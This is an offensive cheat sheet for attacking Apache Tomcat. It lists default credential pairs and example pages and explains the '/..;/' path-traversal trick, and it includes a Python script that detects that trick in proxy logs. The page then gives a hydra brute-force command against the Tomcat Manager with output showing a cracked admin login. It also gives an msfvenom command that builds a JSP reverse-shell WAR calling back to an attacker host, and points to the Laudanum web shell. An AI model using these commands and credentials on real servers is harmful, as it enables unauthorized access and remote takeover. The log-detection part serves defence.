Tomcat
Attacking Tomcat Service
Default Credentials
admin:password
admin:
admin:Password1
admin:password1
admin:admin
admin:tomcat
both:tomcat
manager:manager
role1:role1
role1:tomcat
role:changethis
root:Password1
root:changethis
root:password
root:password1
root:r00t
root:root
root:toor
tomcat:tomcat
tomcat:s3cret
tomcat:password1
tomcat:password
tomcat:
tomcat:admin
tomcat:changethis
Default Pages
/examples/jsp/num/numguess.jsp
/examples/jsp/dates/date.jsp
/examples/jsp/snp/snoop.jsp
/examples/jsp/error/error.html
/examples/jsp/sessions/carts.html
/examples/jsp/checkbox/check.html
/examples/jsp/colors/colors.html
/examples/jsp/cal/login.html
/examples/jsp/include/include.jsp
/examples/jsp/forward/forward.jsp
/examples/jsp/plugin/plugin.jsp
/examples/jsp/jsptoserv/jsptoservlet.jsp
/examples/jsp/simpletag/foo.jsp
/examples/jsp/mail/sendmail.jsp
/examples/servlet/HelloWorldExample
/examples/servlet/RequestInfoExample
/examples/servlet/RequestHeaderExample
/examples/servlet/RequestParamExample
/examples/servlet/CookieExample
/examples/servlet/JndiServlet
/examples/servlet/SessionExample
/tomcat-docs/appdev/sample/web/hello.jsp
/docs
Tomcat Path Traversal
Web servers and reverse proxies normalize the request path. For example, the path /image/../image/ is normalized to /image/. When Apache Tomcat is used together with a reverse proxy such as nginx, there is a normalization inconsistency. Tomcat will treat the sequence /..;/ as /../ and normalize the path, while reverse proxies will not normalize this sequence and will send it to Apache Tomcat as it is. This allows an attacker to access Apache Tomcat resources that are not normally accessible via the reverse proxy mapping.
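The mismatch described above can be hunted for in reverse-proxy access logs. The following is an added example, not part of the original page: a simplified model of the two normalizations (it also covers `..;name=value`, on the assumption that Tomcat drops everything from `;` to the next `/`). The function names and the sample log lines are constructed for illustration.

```python
import posixpath
import re

# Request path from a "combined"-format access log line (nginx/Apache style).
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def strip_path_params(path):
    """Remove ';param' suffixes from every segment: '/a/..;x=1/b' -> '/a/../b'."""
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))

def proxy_view(path):
    """Simplified proxy: ';' is an ordinary character, so '..;' is not '..'."""
    return posixpath.normpath(path)

def tomcat_view(path):
    """Simplified Tomcat: path parameters are dropped, then '..' is resolved."""
    return posixpath.normpath(strip_path_params(path))

def find_mismatches(log_lines):
    """Return (raw_path, proxy_view, tomcat_view) for each request whose
    path has a segment that only becomes '..' once ';...' is stripped."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path = match.group(1).split("?", 1)[0]  # ignore the query string
        if any(";" in seg and seg.split(";", 1)[0] == ".." for seg in path.split("/")):
            hits.append((path, proxy_view(path), tomcat_view(path)))
    return hits

# Constructed sample lines (documentation IP range), not from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [06/May/2024:21:40:01 +0000] "GET /app/index.jsp HTTP/1.1" 200 512 "-" "curl/8.0"',
    '203.0.113.7 - - [06/May/2024:21:40:02 +0000] "GET /app/..;/docs/ HTTP/1.1" 200 9041 "-" "curl/8.0"',
    '203.0.113.9 - - [06/May/2024:21:40:05 +0000] "GET /app/images/logo.png;v=2 HTTP/1.1" 200 733 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [06/May/2024:21:40:09 +0000] "GET /app/static/..;x=1/docs/index.html?q=1 HTTP/1.1" 404 0 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for raw, proxy, tomcat in find_mismatches(SAMPLE_LOG):
        print(f"ALERT raw={raw} proxy_sees={proxy} tomcat_sees={tomcat}")
```

A hit where the two views differ marks a request that the proxy matched under one location while Tomcat resolved it to a different resource.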
Brute Force Attack
hydra -L users.txt -P passwords.txt -f 172.16.8.148 -s 8080 http-get /manager/
Example output:
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-06 21:36:01
[DATA] max 16 tasks per 1 server, overall 16 tasks, 20 login tries (l:4/p:5), ~2 tries per task
[DATA] attacking http-get://172.16.8.148:8080/manager/
[8080][http-get] host: 172.16.8.148 login: admin password: admin
[STATUS] attack finished for 172.16.8.148 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-06 21:36:02
Then log in to Tomcat Manager.

Backdooring Tomcat Manager
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.8.1 LPORT=4448 -f war -o revshell.war
Or use the Laudanum cmd.war shell at /usr/share/laudanum/jsp.
➜ jsp tree
.
├── cmd.war
├── makewar.sh
└── warfiles
    ├── cmd.jsp
    ├── META-INF
    │   └── MANIFEST.MF
    └── WEB-INF
        └── web.xml
4 directories, 5 files
Example of Laudanum WAR Shell

Other Tools
Update soon....